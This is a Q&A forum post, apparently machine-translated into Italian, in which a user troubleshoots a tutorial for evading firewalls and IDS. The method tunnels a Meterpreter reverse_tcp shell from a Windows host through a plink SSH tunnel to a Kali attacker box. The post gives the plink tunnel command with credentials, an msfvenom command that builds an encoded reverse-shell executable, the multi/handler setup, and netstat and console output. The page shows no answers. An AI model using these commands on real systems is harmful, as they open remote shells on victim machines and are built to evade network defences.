SSH Tunneling Issue with Plink

0

quindi sto cercando di seguire questo tutorial per aggirare firewall e IDS instradando il traffico attraverso una pipe SSH e ricevendo una shell rovescia Meterpreter (reverse_tcp) da un computer Windows su Internet. Tuttavia, questo tutorial è abbastanza obsoleto e quindi sembra che abbia colpito un ostacolo.

Questo è il posto in cui mi trovo adesso:

plink -L 6666:mypublicattackerip:6666 mypublicattackerip -l sshuser -pw hssuser1

Questo è il mio output dal seguente comando eseguito in un prompt dei comandi: ("Store key in cache" non è mostrato perché l'ho già eseguito prima)

Using username "sshuser".

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr  6 10:33:46 2018 from .. snip ..
]0;sshuser@kali: ~[01;31msshuser@kali[00m:[01;34m~[00m$

Ricevo una shell interattiva (ma anche deformata) dal mio box Kali che non si trova nel tutorial, ma netstat -anop tcp | findstr 6666 sembra identico a quello mostrato nel tutorial, quindi procedo.

TCP    127.0.0.1:6666         0.0.0.0:0              LISTENING       12828

Quindi ho impostato un Meterpreter multi/handler per windows/meterpreter/reverse_tcp con LHOST impostato sull'indirizzo IP pubblico del mio aggressore, LPORT impostato su 6666 e digitato exploit .

Ho quindi eseguito il reverse shell Meterpreter generato con la stessa riga di comando utilizzata nell'esercitazione

msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=127.0.0.1 LPORT=6666 --encoder x86/shikata_ga_nai -b'\x00' --format exe > reverse_tcpPlink6666Encoded.exe

con Plink connesso così come il mio gestore che ascolta ed ecco che non riesco a tornare alla mia scatola di Kali.

msf exploit(multi/handler) > exploit

[-] Handler failed to bind to mypublicattackerip:6666:-  -
[*] Started reverse TCP handler on 0.0.0.0:6666 
.. no sessions ..

Tuttavia, posso vedere da Process Explorer che:

A. Il processo reverse_tcpPlink6666Encoded.exe è e continua ad essere vivo e quello

B. Se vado alla scheda TCP / IP per quel processo, conferma che ha stabilito con successo una connessione con qualcosa:

e basta.

Ecco cosa dice netstat su tutto questo:

  TCP    127.0.0.1:6666         0.0.0.0:0              LISTENING       17820
  TCP    127.0.0.1:6666         127.0.0.1:55223        ESTABLISHED     17820
  TCP    127.0.0.1:55223        127.0.0.1:6666         ESTABLISHED     14568

Quindi riassumendo tutto, non sono sicuro del motivo per cui non ottengo una connessione inversa al mio nodo Kali dopo tutto questo.

Grazie come sempre.

    
posta 0xHex 06.04.2018 - 18:03
fonte

0 risposte

Leggi altre domande sui tag